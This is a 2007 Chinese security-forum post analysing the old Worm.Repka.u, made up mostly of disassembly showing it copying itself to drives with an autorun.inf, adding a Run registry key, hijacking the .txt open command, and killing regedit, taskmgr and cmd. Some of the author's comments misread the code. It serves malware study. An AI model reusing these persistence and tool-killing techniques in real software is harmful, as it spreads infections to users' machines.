[原创]Worm.Repka.u病毒分析-付费问答-看雪-安全社区|安全招聘|kanxue.com

[旧帖] [原创]Worm.Repka.u病毒分析 0.00雪花

发表于: 2007-6-5 21:30 4660

[旧帖] [原创]Worm.Repka.u病毒分析 0.00雪花

NONAME剑人

2007-6-5 21:30

4660

PS：既然调试论坛不+精，那就发这里来了，给新手们看看：）
（PS：别又扣声望，我还指望这篇文章让我的声望提高到10呢！）

【文章标题】: Worm.Repka.u病毒分析
【文章作者】: NoName剑人
【作者邮箱】: wangjunyi2008@sina.com
【作者主页】: 无
【作者QQ号】: 464252600(请注明－破解－)
【软件名称】: Worm.Repka.u
【软件大小】: 204KB
【下载地址】: 自己搜索下载或见附件
【加壳方式】: 无壳
【保护方式】: 利用API来杀掉别的进程以防止被×
【编写语言】: VC++
【使用工具】: C32ASM OD
【操作平台】: XP上成功
【软件介绍】: 虫子病毒:p
【作者声明】: 只是感兴趣，没有其他目的。失误之处敬请诸位大侠赐教!
--------------------------------------------------------------------------------
【详细过程】
  晕，累死我了。我可能是CRACKER里最小的了，初中……最近几天有高考，所以把双休日放到789三天了，我们已经学了10天
  没休息了（汗～）

  废话少说，咱来看看这个病毒，那是几年前的老病毒了，没什么威力（哪高人去整PANDA去？）所以才敢从病毒库里翻出来

  首先用QUICK UNPACK（好用的查壳软件，但是脱壳在我机器上一次没实现过。人品问题？），无壳。
  然后用C32ASM(0D老看不见中文……)看，找到几个病毒代码集中的地方，分析：

  00401850  /> \55          PUSH EBP
  00401851  |.  8BEC       MOV EBP,ESP
  00401853  |.  81EC 70010000 SUB ESP,170
  00401859  |.  53          PUSH EBX
  0040185A  |.  56          PUSH ESI
  0040185B  |.  57          PUSH EDI
  0040185C  |.  8DBD 90FEFFFF LEA EDI,DWORD PTR SS:[EBP-170]
  00401862  |.  B9 5C000000 MOV ECX,5C
  00401867  |.  B8 CCCCCCCC MOV EAX,CCCCCCCC
  0040186C  |.  F3:AB       REP STOS DWORD PTR ES:[EDI]
  0040186E  |.  8BF4       MOV ESI,ESP
  00401870  |.  68 00ED4200 PUSH A0002798.0042ED00                ; /pThreadId = A0002798.0042ED00
  00401875  |.  6A 00       PUSH 0                                  ; |CreationFlags = 0
  00401877  |.  6A 00       PUSH 0                                  ; |pThreadParm = NULL
  00401879  |.  68 2D104000 PUSH A0002798.0040102D                ; |ThreadFunction = A0002798.0040102D
  0040187E  |.  6A 00       PUSH 0                                  ; |StackSize = 0
  00401880  |.  6A 00       PUSH 0                                  ; |pSecurity = NULL
  00401882  |.  FF15 4C134300 CALL DWORD PTR DS:[<&KERNEL32.CreateThre>; \CreateThread?释放？
  00401888  |.  3BF4       CMP ESI,ESP
  0040188A  |.  E8 514F0000 CALL A0002798.004067E0
  0040188F  |.  A3 F8EC4200 MOV DWORD PTR DS:[42ECF8],EAX
  00401894  |.  C745 FC 04000>MOV DWORD PTR SS:[EBP-4],4
  0040189B  |.  C645 F8 63 MOV BYTE PTR SS:[EBP-8],63
  0040189F  |.  833D 0CEE4200>CMP DWORD PTR DS:[42EE0C],0
  004018A6  |.  0F85 21020000 JNZ A0002798.00401ACD
  004018AC  |.  8BF4       MOV ESI,ESP
  004018AE  |.  FF15 C4124300 CALL DWORD PTR DS:[<&KERNEL32.GetLogical>; [GetLogicalDrives
  004018B4  |.  3BF4       CMP ESI,ESP
  004018B6  |.  E8 254F0000 CALL A0002798.004067E0
  004018BB  |.  8985 F4FEFFFF MOV DWORD PTR SS:[EBP-10C],EAX
  004018C1  |.  C785 F0FEFFFF>MOV DWORD PTR SS:[EBP-110],0
  004018CB  |.  EB 0F       JMP SHORT A0002798.004018DC
  004018CD  |>  8B85 F0FEFFFF /MOV EAX,DWORD PTR SS:[EBP-110]
  004018D3  |.  83C0 01    |ADD EAX,1
  004018D6  |.  8985 F0FEFFFF |MOV DWORD PTR SS:[EBP-110],EAX
  004018DC  |>  83BD F0FEFFFF> CMP DWORD PTR SS:[EBP-110],20
  004018E3  |.  0F8D 05010000 |JGE A0002798.004019EE
  004018E9  |.  8B8D F4FEFFFF |MOV ECX,DWORD PTR SS:[EBP-10C]
  004018EF  |.  234D FC    |AND ECX,DWORD PTR SS:[EBP-4]
  004018F2  |.  85C9       |TEST ECX,ECX
  004018F4  |.  0F84 DE000000 |JE A0002798.004019D8
  004018FA  |.  68 DCA04200 |PUSH A0002798.0042A0DC                ; / ASCII ":\reper.exe" //这个应该是释放文件
  004018FF  |.  0FBE55 F8    |MOVSX EDX,BYTE PTR SS:[EBP-8]          ; |
  00401903  |.  52          |PUSH EDX                               ; |Arg3
  00401904  |.  68 74A14200 |PUSH A0002798.0042A174                ; |Arg2 = 0042A174 ASCII "%c%s"
  00401909  |.  8D85 F8FEFFFF |LEA EAX,DWORD PTR SS:[EBP-108]       ; |
  0040190F  |.  50          |PUSH EAX                               ; |Arg1
  00401910  |.  E8 EB4C0000 |CALL A0002798.00406600                ; \A0002798.00406600
  00401915  |.  83C4 10    |ADD ESP,10
  00401918  |.  8D8D F8FEFFFF |LEA ECX,DWORD PTR SS:[EBP-108]
  0040191E  |.  51          |PUSH ECX
  0040191F  |.  E8 04F7FFFF |CALL A0002798.00401028
  00401924  |.  83C4 04    |ADD ESP,4
  00401927  |.  3B05 10EE4200 |CMP EAX,DWORD PTR DS:[42EE10]
  0040192D  |.  74 1E       |JE SHORT A0002798.0040194D
  0040192F  |.  8D95 F8FEFFFF |LEA EDX,DWORD PTR SS:[EBP-108]
  00401935  |.  52          |PUSH EDX
  00401936  |.  E8 D9F6FFFF |CALL A0002798.00401014
  0040193B  |.  83C4 04    |ADD ESP,4
  0040193E  |.  8D85 F8FEFFFF |LEA EAX,DWORD PTR SS:[EBP-108]
  00401944  |.  50          |PUSH EAX                               ; /Arg1
  00401945  |.  E8 C64F0000 |CALL A0002798.00406910                ; \A0002798.00406910
  0040194A  |.  83C4 04    |ADD ESP,4
  0040194D  |>  8D8D F8FEFFFF |LEA ECX,DWORD PTR SS:[EBP-108]
  00401953  |.  51          |PUSH ECX
  00401954  |.  E8 B1F6FFFF |CALL A0002798.0040100A
  00401959  |.  83C4 04    |ADD ESP,4
  0040195C  |.  8D95 F8FEFFFF |LEA EDX,DWORD PTR SS:[EBP-108]
  00401962  |.  52          |PUSH EDX
  00401963  |.  E8 A7F6FFFF |CALL A0002798.0040100F
  00401968  |.  83C4 04    |ADD ESP,4
  0040196B  |.  68 6CA04200 |PUSH A0002798.0042A06C                ; / ASCII ":\AUTORUN.exe" //这个也应该是释放文件
  00401970  |.  0FBE45 F8    |MOVSX EAX,BYTE PTR SS:[EBP-8]          ; |
  00401974  |.  50          |PUSH EAX                               ; |Arg3
  00401975  |.  68 74A14200 |PUSH A0002798.0042A174                ; |Arg2 = 0042A174 ASCII "%c%s"
  0040197A  |.  8D8D F8FEFFFF |LEA ECX,DWORD PTR SS:[EBP-108]       ; |
  00401980  |.  51          |PUSH ECX                               ; |Arg1
  00401981  |.  E8 7A4C0000 |CALL A0002798.00406600                ; \A0002798.00406600
  00401986  |.  83C4 10    |ADD ESP,10
  00401989  |.  8D95 F8FEFFFF |LEA EDX,DWORD PTR SS:[EBP-108]
  0040198F  |.  52          |PUSH EDX
  00401990  |.  E8 A2F6FFFF |CALL A0002798.00401037
  00401995  |.  83C4 04    |ADD ESP,4
  00401998  |.  85C0       |TEST EAX,EAX
  0040199A  |.  75 1E       |JNZ SHORT A0002798.004019BA
  0040199C  |.  8D85 F8FEFFFF |LEA EAX,DWORD PTR SS:[EBP-108]
  004019A2  |.  50          |PUSH EAX
  004019A3  |.  E8 6CF6FFFF |CALL A0002798.00401014
  004019A8  |.  83C4 04    |ADD ESP,4
  004019AB  |.  8D8D F8FEFFFF |LEA ECX,DWORD PTR SS:[EBP-108]
  004019B1  |.  51          |PUSH ECX                               ; /Arg1
  004019B2  |.  E8 594F0000 |CALL A0002798.00406910                ; \A0002798.00406910
  004019B7  |.  83C4 04    |ADD ESP,4
  004019BA  |>  8D95 F8FEFFFF |LEA EDX,DWORD PTR SS:[EBP-108]
  004019C0  |.  52          |PUSH EDX
  004019C1  |.  E8 3FF6FFFF |CALL A0002798.00401005
  004019C6  |.  83C4 04    |ADD ESP,4
  004019C9  |.  8D85 F8FEFFFF |LEA EAX,DWORD PTR SS:[EBP-108]
  004019CF  |.  50          |PUSH EAX
  004019D0  |.  E8 3AF6FFFF |CALL A0002798.0040100F
  004019D5  |.  83C4 04    |ADD ESP,4
  004019D8  |>  8B4D FC    |MOV ECX,DWORD PTR SS:[EBP-4]
  004019DB  |.  D1E1       |SHL ECX,1
  004019DD  |.  894D FC    |MOV DWORD PTR SS:[EBP-4],ECX
  004019E0  |.  8A55 F8    |MOV DL,BYTE PTR SS:[EBP-8]
  004019E3  |.  80C2 01    |ADD DL,1
  004019E6  |.  8855 F8    |MOV BYTE PTR SS:[EBP-8],DL
  004019E9  |.^ E9 DFFEFFFF \JMP A0002798.004018CD
  004019EE  |>  68 44A14200 PUSH A0002798.0042A144                ; / ASCII "VIEWER.exe" //这个还应该是释放文件
  004019F3  |.  68 F8EB4200 PUSH A0002798.0042EBF8                ; |Arg3 = 0042EBF8
  004019F8  |.  68 30A04200 PUSH A0002798.0042A030                ; |Arg2 = 0042A030 ASCII "%s%s"
  004019FD  |.  68 F8EA4200 PUSH A0002798.0042EAF8                ; |Arg1 = 0042EAF8
  00401A02  |.  E8 F94B0000 CALL A0002798.00406600                ; \A0002798.00406600
  00401A07  |.  83C4 10    ADD ESP,10
  00401A0A  |.  68 F8EA4200 PUSH A0002798.0042EAF8
  00401A0F  |.  E8 14F6FFFF CALL A0002798.00401028
  00401A14  |.  83C4 04    ADD ESP,4
  00401A17  |.  3B05 10EE4200 CMP EAX,DWORD PTR DS:[42EE10]
  00401A1D  |.  74 1A       JE SHORT A0002798.00401A39
  00401A1F  |.  68 F8EA4200 PUSH A0002798.0042EAF8
  00401A24  |.  E8 EBF5FFFF CALL A0002798.00401014
  00401A29  |.  83C4 04    ADD ESP,4
  00401A2C  |.  68 F8EA4200 PUSH A0002798.0042EAF8                ; /Arg1 = 0042EAF8
  00401A31  |.  E8 DA4E0000 CALL A0002798.00406910                ; \A0002798.00406910
  00401A36  |.  83C4 04    ADD ESP,4
  00401A39  |>  68 F8EA4200 PUSH A0002798.0042EAF8
  00401A3E  |.  E8 C7F5FFFF CALL A0002798.0040100A
  00401A43  |.  83C4 04    ADD ESP,4
  00401A46  |.  68 F8EA4200 PUSH A0002798.0042EAF8
  00401A4B  |.  E8 C4F5FFFF CALL A0002798.00401014
  00401A50  |.  83C4 04    ADD ESP,4
  00401A53  |.  68 F8EB4200 PUSH A0002798.0042EBF8                ; /Arg3 = 0042EBF8
  00401A58  |.  68 2CA14200 PUSH A0002798.0042A12C                ; | ASCII "%ssystem32\NOTEPAD.EXE" //这个应该hai是释放文件
  00401A5D  |.  68 F8E94200 PUSH A0002798.0042E9F8                ; |Arg1 = 0042E9F8
  00401A62  |.  E8 994B0000 CALL A0002798.00406600                ; \A0002798.00406600
  00401A67  |.  83C4 0C    ADD ESP,0C
  00401A6A  |.  68 F8E94200 PUSH A0002798.0042E9F8
  00401A6F  |.  E8 B4F5FFFF CALL A0002798.00401028
  00401A74  |.  83C4 04    ADD ESP,4
  00401A77  |.  3B05 10EE4200 CMP EAX,DWORD PTR DS:[42EE10]
  00401A7D  |.  74 1A       JE SHORT A0002798.00401A99
  00401A7F  |.  68 F8E94200 PUSH A0002798.0042E9F8
  00401A84  |.  E8 8BF5FFFF CALL A0002798.00401014
  00401A89  |.  83C4 04    ADD ESP,4
  00401A8C  |.  68 F8E94200 PUSH A0002798.0042E9F8                ; /Arg1 = 0042E9F8
  00401A91  |.  E8 7A4E0000 CALL A0002798.00406910                ; \A0002798.00406910
  00401A96  |.  83C4 04    ADD ESP,4
  00401A99  |>  68 F8E94200 PUSH A0002798.0042E9F8
  00401A9E  |.  E8 67F5FFFF CALL A0002798.0040100A
  00401AA3  |.  83C4 04    ADD ESP,4
  00401AA6  |.  68 F8E94200 PUSH A0002798.0042E9F8
  00401AAB  |.  E8 64F5FFFF CALL A0002798.00401014
  00401AB0  |.  83C4 04    ADD ESP,4
  00401AB3  |.  68 50B34200 PUSH A0002798.0042B350
  00401AB8  |.  E8 4DF5FFFF CALL A0002798.0040100A
  00401ABD  |.  83C4 04    ADD ESP,4
  00401AC0  |.  68 50B34200 PUSH A0002798.0042B350
  00401AC5  |.  E8 4AF5FFFF CALL A0002798.00401014
  00401ACA  |.  83C4 04    ADD ESP,4
  00401ACD  |>  A1 0CEE4200 MOV EAX,DWORD PTR DS:[42EE0C]
  00401AD2  |.  83C0 01    ADD EAX,1
  00401AD5  |.  A3 0CEE4200 MOV DWORD PTR DS:[42EE0C],EAX
  00401ADA  |.  A1 0CEE4200 MOV EAX,DWORD PTR DS:[42EE0C]
  00401ADF  |.  99          CDQ
  00401AE0  |.  B9 05000000 MOV ECX,5
  00401AE5  |.  F7F9       IDIV ECX
  00401AE7  |.  8915 0CEE4200 MOV DWORD PTR DS:[42EE0C],EDX
  00401AED  |.  C785 ECFEFFFF>MOV DWORD PTR SS:[EBP-114],A0002798.0042>
  00401AF7  |.  C785 E4FEFFFF>MOV DWORD PTR SS:[EBP-11C],A0002798.0042>;  干坏事了！ ASCII "Software\Microsoft\Windows\CurrentVersion\Run"写注册表
  00401B01  |.  8BF4       MOV ESI,ESP                            ;  写注册表取得开机运行权
  00401B03  |.  8D95 E8FEFFFF LEA EDX,DWORD PTR SS:[EBP-118]
  00401B09  |.  52          PUSH EDX                               ; /pHandle
  00401B0A  |.  68 06000200 PUSH 20006                            ; |Access = KEY_WRITE
  00401B0F  |.  6A 00       PUSH 0                                  ; |Reserved = 0
  00401B11  |.  8B85 E4FEFFFF MOV EAX,DWORD PTR SS:[EBP-11C]          ; |
  00401B17  |.  50          PUSH EAX                               ; |Subkey
  00401B18  |.  68 02000080 PUSH 80000002                         ; |hKey = HKEY_LOCAL_MACHINE
  00401B1D  |.  FF15 8C124300 CALL DWORD PTR DS:[<&ADVAPI32.RegOpenKey>; \RegOpenKeyExA
  00401B23  |.  3BF4       CMP ESI,ESP
  00401B25  |.  E8 B64C0000 CALL A0002798.004067E0
  00401B2A  |.  8985 E0FEFFFF MOV DWORD PTR SS:[EBP-120],EAX
  00401B30  |.  8B8D ECFEFFFF MOV ECX,DWORD PTR SS:[EBP-114]
  00401B36  |.  51          PUSH ECX
  00401B37  |.  E8 C44B0000 CALL A0002798.00406700
  00401B3C  |.  83C4 04    ADD ESP,4
  00401B3F  |.  8BF4       MOV ESI,ESP
  00401B41  |.  50          PUSH EAX                               ; /BufSize
  00401B42  |.  8B95 ECFEFFFF MOV EDX,DWORD PTR SS:[EBP-114]          ; |
  00401B48  |.  52          PUSH EDX                               ; |Buffer
  00401B49  |.  6A 01       PUSH 1                                  ; |ValueType = REG_SZ
  00401B4B  |.  6A 00       PUSH 0                                  ; |Reserved = 0
  00401B4D  |.  68 ACA04200 PUSH A0002798.0042A0AC                ; |ValueName = "runreper"
  00401B52  |.  8B85 E8FEFFFF MOV EAX,DWORD PTR SS:[EBP-118]          ; |
  00401B58  |.  50          PUSH EAX                               ; |hKey
  00401B59  |.  FF15 80124300 CALL DWORD PTR DS:[<&ADVAPI32.RegSetValu>; \RegSetValueExA
  00401B5F  |.  3BF4       CMP ESI,ESP
  00401B61  |.  E8 7A4C0000 CALL A0002798.004067E0
  00401B66  |.  8985 DCFEFFFF MOV DWORD PTR SS:[EBP-124],EAX
  00401B6C  |.  8BF4       MOV ESI,ESP
  00401B6E  |.  8B8D E8FEFFFF MOV ECX,DWORD PTR SS:[EBP-118]
  00401B74  |.  51          PUSH ECX                               ; /hKey
  00401B75  |.  FF15 84124300 CALL DWORD PTR DS:[<&ADVAPI32.RegCloseKe>; \RegCloseKey
  00401B7B  |.  3BF4       CMP ESI,ESP
  00401B7D  |.  E8 5E4C0000 CALL A0002798.004067E0                ;  又改TXT的关联
  00401B82  |.  C785 E4FEFFFF>MOV DWORD PTR SS:[EBP-11C],A0002798.0042>;  ASCII "txtfile\shell\open\command"
  00401B8C  |.  C785 D8FEFFFF>MOV DWORD PTR SS:[EBP-128],A0002798.0042>
  00401B96  |.  68 68A04200 PUSH A0002798.0042A068                ;  ASCII " %1"
  00401B9B  |.  8B95 D8FEFFFF MOV EDX,DWORD PTR SS:[EBP-128]
  00401BA1  |.  52          PUSH EDX
  00401BA2  |.  E8 894C0000 CALL A0002798.00406830
  00401BA7  |.  83C4 08    ADD ESP,8
  00401BAA  |.  8BF4       MOV ESI,ESP
  00401BAC  |.  8D85 E8FEFFFF LEA EAX,DWORD PTR SS:[EBP-118]
  00401BB2  |.  50          PUSH EAX                               ; /pHandle
  00401BB3  |.  68 06000200 PUSH 20006                            ; |Access = KEY_WRITE
  00401BB8  |.  6A 00       PUSH 0                                  ; |Reserved = 0
  00401BBA  |.  8B8D E4FEFFFF MOV ECX,DWORD PTR SS:[EBP-11C]          ; |
  00401BC0  |.  51          PUSH ECX                               ; |Subkey
  00401BC1  |.  68 00000080 PUSH 80000000                         ; |hKey = HKEY_CLASSES_ROOT
  00401BC6  |.  FF15 8C124300 CALL DWORD PTR DS:[<&ADVAPI32.RegOpenKey>; \RegOpenKeyExA
  00401BCC  |.  3BF4       CMP ESI,ESP
  00401BCE  |.  E8 0D4C0000 CALL A0002798.004067E0
  00401BD3  |.  8985 D4FEFFFF MOV DWORD PTR SS:[EBP-12C],EAX
  00401BD9  |.  8B95 D8FEFFFF MOV EDX,DWORD PTR SS:[EBP-128]
  00401BDF  |.  52          PUSH EDX
  00401BE0  |.  E8 1B4B0000 CALL A0002798.00406700
  00401BE5  |.  83C4 04    ADD ESP,4
  00401BE8  |.  8BF4       MOV ESI,ESP
  00401BEA  |.  50          PUSH EAX                               ; /BufSize
  00401BEB  |.  8B85 D8FEFFFF MOV EAX,DWORD PTR SS:[EBP-128]          ; |
  00401BF1  |.  50          PUSH EAX                               ; |Buffer
  00401BF2  |.  6A 02       PUSH 2                                  ; |ValueType = REG_EXPAND_SZ
  00401BF4  |.  6A 00       PUSH 0                                  ; |Reserved = 0
  00401BF6  |.  6A 00       PUSH 0                                  ; |ValueName = NULL
  00401BF8  |.  8B8D E8FEFFFF MOV ECX,DWORD PTR SS:[EBP-118]          ; |
  00401BFE  |.  51          PUSH ECX                               ; |hKey
  00401BFF  |.  FF15 80124300 CALL DWORD PTR DS:[<&ADVAPI32.RegSetValu>; \RegSetValueExA
  00401C05  |.  3BF4       CMP ESI,ESP
  00401C07  |.  E8 D44B0000 CALL A0002798.004067E0
  00401C0C  |.  8985 D0FEFFFF MOV DWORD PTR SS:[EBP-130],EAX
  00401C12  |.  8BF4       MOV ESI,ESP
  00401C14  |.  8B95 E8FEFFFF MOV EDX,DWORD PTR SS:[EBP-118]
  00401C1A  |.  52          PUSH EDX                               ; /hKey
  00401C1B  |.  FF15 84124300 CALL DWORD PTR DS:[<&ADVAPI32.RegCloseKe>; \RegCloseKey
  00401C21  |.  3BF4       CMP ESI,ESP
  00401C23  |.  E8 B84B0000 CALL A0002798.004067E0
  00401C28  |.  5F          POP EDI
  00401C29  |.  5E          POP ESI
  00401C2A  |.  5B          POP EBX
  00401C2B  |.  81C4 70010000 ADD ESP,170
  00401C31  |.  3BEC       CMP EBP,ESP
  00401C33  |.  E8 A84B0000 CALL A0002798.004067E0
  00401C38  |.  8BE5       MOV ESP,EBP
  00401C3A  |.  5D          POP EBP
  00401C3B  \.  C2 1000    RETN 10

  在里面分析了，我也不写了……

  还有

  00401FF0 > \55          PUSH EBP
  00401FF1 .  8BEC       MOV EBP,ESP
  00401FF3 .  6A FF       PUSH -1
  00401FF5 .  68 098A4100 PUSH A0002798.00418A09                ;  SE 处理程序安装
  00401FFA .  64:A1 0000000>MOV EAX,DWORD PTR FS:[0]
  00402000 .  50          PUSH EAX
  00402001 .  64:8925 00000>MOV DWORD PTR FS:[0],ESP
  00402008 .  81EC B0000000 SUB ESP,0B0
  0040200E .  53          PUSH EBX
  0040200F .  56          PUSH ESI
  00402010 .  57          PUSH EDI
  00402011 .  8DBD 44FFFFFF LEA EDI,DWORD PTR SS:[EBP-BC]
  00402017 .  B9 2C000000 MOV ECX,2C
  0040201C .  B8 CCCCCCCC MOV EAX,CCCCCCCC
  00402021 .  F3:AB       REP STOS DWORD PTR ES:[EDI]
  00402023 .  6A 01       PUSH 1                                  ; /Arg1 = 00000001
  00402025 .  8D4D AC    LEA ECX,DWORD PTR SS:[EBP-54]          ; |
  00402028 .  E8 83050000 CALL A0002798.004025B0                ; \A0002798.004025B0
  0040202D .  C745 FC 00000>MOV DWORD PTR SS:[EBP-4],0
  00402034 .  A1 3CA24200 MOV EAX,DWORD PTR DS:[42A23C]
  00402039 .  50          PUSH EAX                               ; /Arg3 => 000001A4
  0040203A .  6A 01       PUSH 1                                  ; |Arg2 = 00000001
  0040203C .  8B4D 08    MOV ECX,DWORD PTR SS:[EBP+8]          ; |
  0040203F .  51          PUSH ECX                               ; |Arg1
  00402040 .  8D4D AC    LEA ECX,DWORD PTR SS:[EBP-54]          ; |
  00402043 .  E8 780C0000 CALL A0002798.00402CC0                ; \A0002798.00402CC0
  00402048 .  6A 1A       PUSH 1A                               ; /Arg2 = 0000001A
  0040204A .  8D55 8C    LEA EDX,DWORD PTR SS:[EBP-74]          ; |
  0040204D .  52          PUSH EDX                               ; |Arg1
  0040204E .  8D4D AC    LEA ECX,DWORD PTR SS:[EBP-54]          ; |
  00402051 .  E8 8A2A0000 CALL A0002798.00404AE0                ; \A0002798.00404AE0
  00402056 .  8D4D AC    LEA ECX,DWORD PTR SS:[EBP-54]
  00402059 .  E8 E20C0000 CALL A0002798.00402D40
  0040205E .  C645 A5 00 MOV BYTE PTR SS:[EBP-5B],0
  00402062 .  68 44A04200 PUSH A0002798.0042A044                ;  ASCII "[autorun]" //开始在U盘里写AUTORUN.INF....
  00402067 .  8D45 8C    LEA EAX,DWORD PTR SS:[EBP-74]
  0040206A .  50          PUSH EAX
  0040206B .  E8 E04D0000 CALL A0002798.00406E50
  00402070 .  83C4 08    ADD ESP,8
  00402073 .  85C0       TEST EAX,EAX
  00402075 .  74 30       JE SHORT A0002798.004020A7
  00402077 .  68 50A04200 PUSH A0002798.0042A050                ;  ASCII "open=reper.exe" //看来这个程序的原文件名就是这个了
  0040207C .  8D4D 8C    LEA ECX,DWORD PTR SS:[EBP-74]
  0040207F .  51          PUSH ECX
  00402080 .  E8 CB4D0000 CALL A0002798.00406E50
  00402085 .  83C4 08    ADD ESP,8
  00402088 .  85C0       TEST EAX,EAX
  0040208A .  74 1B       JE SHORT A0002798.004020A7
  0040208C .  C745 88 01000>MOV DWORD PTR SS:[EBP-78],1
  00402093 .  C745 FC FFFFF>MOV DWORD PTR SS:[EBP-4],-1
  0040209A .  8D4D AC    LEA ECX,DWORD PTR SS:[EBP-54]
  0040209D .  E8 90EFFFFF CALL A0002798.00401032
  004020A2 .  8B45 88    MOV EAX,DWORD PTR SS:[EBP-78]
  004020A5 .  EB 19       JMP SHORT A0002798.004020C0
  004020A7 >  C745 84 00000>MOV DWORD PTR SS:[EBP-7C],0
  004020AE .  C745 FC FFFFF>MOV DWORD PTR SS:[EBP-4],-1
  004020B5 .  8D4D AC    LEA ECX,DWORD PTR SS:[EBP-54]
  004020B8 .  E8 75EFFFFF CALL A0002798.00401032
  004020BD .  8B45 84    MOV EAX,DWORD PTR SS:[EBP-7C]
  004020C0 >  8B4D F4    MOV ECX,DWORD PTR SS:[EBP-C]
  004020C3 .  64:890D 00000>MOV DWORD PTR FS:[0],ECX
  004020CA .  5F          POP EDI
  004020CB .  5E          POP ESI
  004020CC .  5B          POP EBX
  004020CD .  81C4 BC000000 ADD ESP,0BC
  004020D3 .  3BEC       CMP EBP,ESP
  004020D5 .  E8 06470000 CALL A0002798.004067E0
  004020DA .  8BE5       MOV ESP,EBP
  004020DC .  5D          POP EBP
  004020DD .  C3          RETN




  004021C0  /> \55          PUSH EBP
  004021C1  |.  8BEC       MOV EBP,ESP
  004021C3  |.  81EC 70010000 SUB ESP,170
  004021C9  |.  53          PUSH EBX
  004021CA  |.  56          PUSH ESI
  004021CB  |.  57          PUSH EDI
  004021CC  |.  8DBD 90FEFFFF LEA EDI,DWORD PTR SS:[EBP-170]
  004021D2  |.  B9 5C000000 MOV ECX,5C
  004021D7  |.  B8 CCCCCCCC MOV EAX,CCCCCCCC
  004021DC  |.  F3:AB       REP STOS DWORD PTR ES:[EDI]
  004021DE  |>  B8 01000000 /MOV EAX,1
  004021E3  |.  85C0       |TEST EAX,EAX
  004021E5  |.  0F84 F1010000 |JE A0002798.004023DC
  004021EB  |.  C745 FC 00000>|MOV DWORD PTR SS:[EBP-4],0
  004021F2  |.  C785 D4FEFFFF>|MOV DWORD PTR SS:[EBP-12C],0
  004021FC  |.  B9 49000000 |MOV ECX,49
  00402201  |.  33C0       |XOR EAX,EAX
  00402203  |.  8DBD D8FEFFFF |LEA EDI,DWORD PTR SS:[EBP-128]
  00402209  |.  F3:AB       |REP STOS DWORD PTR ES:[EDI]
  0040220B  |.  6A 00       |PUSH 0                               ; /ProcessID = 0
  0040220D  |.  6A 02       |PUSH 2                               ; |Flags = TH32CS_SNAPPROCESS
  0040220F  |.  E8 08030000 |CALL <JMP.&KERNEL32.CreateToolhelp32Sna>; \CreateToolhelp32Snapshot // 应该是截图吧
  00402214  |.  8945 FC    |MOV DWORD PTR SS:[EBP-4],EAX
  00402217  |.  C785 D4FEFFFF>|MOV DWORD PTR SS:[EBP-12C],128
  00402221  |.  8D8D D4FEFFFF |LEA ECX,DWORD PTR SS:[EBP-12C]
  00402227  |.  51          |PUSH ECX                               ; /pProcessentry
  00402228  |.  8B55 FC    |MOV EDX,DWORD PTR SS:[EBP-4]          ; |
  0040222B  |.  52          |PUSH EDX                               ; |hSnapshot
  0040222C  |.  E8 E5020000 |CALL <JMP.&KERNEL32.Process32First>    ; \Process32First
  00402231  |>  8BF4       |/MOV ESI,ESP
  00402233  |.  8D85 F8FEFFFF ||LEA EAX,DWORD PTR SS:[EBP-108]
  00402239  |.  50          ||PUSH EAX                            ; /StringOrChar
  0040223A  |.  FF15 2C144300 ||CALL DWORD PTR DS:[<&USER32.CharLowerA>; \CharLowerA
  00402240  |.  3BF4       ||CMP ESI,ESP
  00402242  |.  E8 99450000 ||CALL A0002798.004067E0
  00402247  |.  8985 D0FEFFFF ||MOV DWORD PTR SS:[EBP-130],EAX       ;  碰上下面几个喀掉
  0040224D  |.  68 98A04200 ||PUSH A0002798.0042A098                ;  ASCII "regedit.exe"
  00402252  |.  8B8D D0FEFFFF ||MOV ECX,DWORD PTR SS:[EBP-130]
  00402258  |.  51          ||PUSH ECX
  00402259  |.  E8 F24B0000 ||CALL A0002798.00406E50
  0040225E  |.  83C4 08    ||ADD ESP,8
  00402261  |.  85C0       ||TEST EAX,EAX
  00402263  |.  75 48       ||JNZ SHORT A0002798.004022AD
  00402265  |.  68 14A14200 ||PUSH A0002798.0042A114                ;  ASCII "taskmgr.exe"
  0040226A  |.  8B95 D0FEFFFF ||MOV EDX,DWORD PTR SS:[EBP-130]
  00402270  |.  52          ||PUSH EDX
  00402271  |.  E8 DA4B0000 ||CALL A0002798.00406E50
  00402276  |.  83C4 08    ||ADD ESP,8
  00402279  |.  85C0       ||TEST EAX,EAX
  0040227B  |.  75 30       ||JNZ SHORT A0002798.004022AD
  0040227D  |.  68 08A14200 ||PUSH A0002798.0042A108                ;  ASCII "cmd.exe"
  00402282  |.  8B85 D0FEFFFF ||MOV EAX,DWORD PTR SS:[EBP-130]
  00402288  |.  50          ||PUSH EAX
  00402289  |.  E8 C24B0000 ||CALL A0002798.00406E50
  0040228E  |.  83C4 08    ||ADD ESP,8
  00402291  |.  85C0       ||TEST EAX,EAX
  00402293  |.  75 18       ||JNZ SHORT A0002798.004022AD
  00402295  |.  68 E4A14200 ||PUSH A0002798.0042A1E4                ;  ASCII "ntvdm.exe"
  0040229A  |.  8B8D D0FEFFFF ||MOV ECX,DWORD PTR SS:[EBP-130]
  004022A0  |.  51          ||PUSH ECX
  004022A1  |.  E8 AA4B0000 ||CALL A0002798.00406E50
  004022A6  |.  83C4 08    ||ADD ESP,8
  004022A9  |.  85C0       ||TEST EAX,EAX
  004022AB  |.  74 2F       ||JE SHORT A0002798.004022DC
  004022AD  |>  8BF4       ||MOV ESI,ESP
  004022AF  |.  6A 01       ||PUSH 1
  004022B1  |.  8BFC       ||MOV EDI,ESP
  004022B3  |.  8B95 DCFEFFFF ||MOV EDX,DWORD PTR SS:[EBP-124]
  004022B9  |.  52          ||PUSH EDX                            ; /ProcessId
  004022BA  |.  6A 00       ||PUSH 0                               ; |Inheritable = FALSE
  004022BC  |.  68 FF0F1F00 ||PUSH 1F0FFF                         ; |Access = PROCESS_ALL_ACCESS
  004022C1  |.  FF15 E0124300 ||CALL DWORD PTR DS:[<&KERNEL32.OpenProc>; \OpenProcess.开始枚举了
  004022C7  |.  3BFC       ||CMP EDI,ESP
  004022C9  |.  E8 12450000 ||CALL A0002798.004067E0
  004022CE  |.  50          ||PUSH EAX                            ; |hProcess
  004022CF  |.  FF15 DC124300 ||CALL DWORD PTR DS:[<&KERNEL32.Terminat>; \TerminateProcess
  004022D5  |.  3BF4       ||CMP ESI,ESP
  004022D7  |.  E8 04450000 ||CALL A0002798.004067E0
  004022DC  |>  68 D4A14200 ||PUSH A0002798.0042A1D4                ;  ASCII "proc"
  004022E1  |.  8B85 D0FEFFFF ||MOV EAX,DWORD PTR SS:[EBP-130]
  004022E7  |.  50          ||PUSH EAX
  004022E8  |.  E8 634B0000 ||CALL A0002798.00406E50
